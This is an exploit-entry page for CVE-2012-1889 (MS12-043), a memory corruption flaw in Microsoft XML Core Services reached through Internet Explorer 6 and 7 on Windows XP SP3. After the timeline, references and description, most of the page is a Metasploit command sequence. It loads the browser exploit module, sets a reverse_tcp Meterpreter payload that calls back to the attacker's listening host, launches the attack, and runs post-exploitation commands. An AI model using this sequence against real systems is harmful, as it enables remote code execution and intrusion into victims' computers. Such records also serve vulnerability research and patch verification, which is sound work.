Timeline :

Vulnerability found exploited in the wild
Public release of the vulnerability the 2012-06-12
Metasploit PoC provided the 2012-06-15

PoC provided by :

sinn3r
juan vazquez

Reference(s) :

MSA-2719615
MS12-043
MS KB 2719615
CVE-2012-1889
OSVDB-82873

Affected version(s) :

Microsoft XML Core Services 3.0, 4.0, 5.0, and 6.0.

Tested on Windows XP Pro SP3 with :

Internet Explorer 6 (6.0.2900.5512.xpsp_sp3_gdr.11025-1629)

Description :

This module exploits a memory corruption flaw in Microsoft XML Core Services when trying to access an uninitialized Node with the getDefinition API, which may corrupt memory allowing remote code execution. At the moment, this module only targets Microsoft XML Core Services 3.0 via IE6 and IE7 over Windows XP SP3.

Commands :

use exploit/windows/browser/msxml_get_definition_code_exec
set SRVHOST 192.168.178.100
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid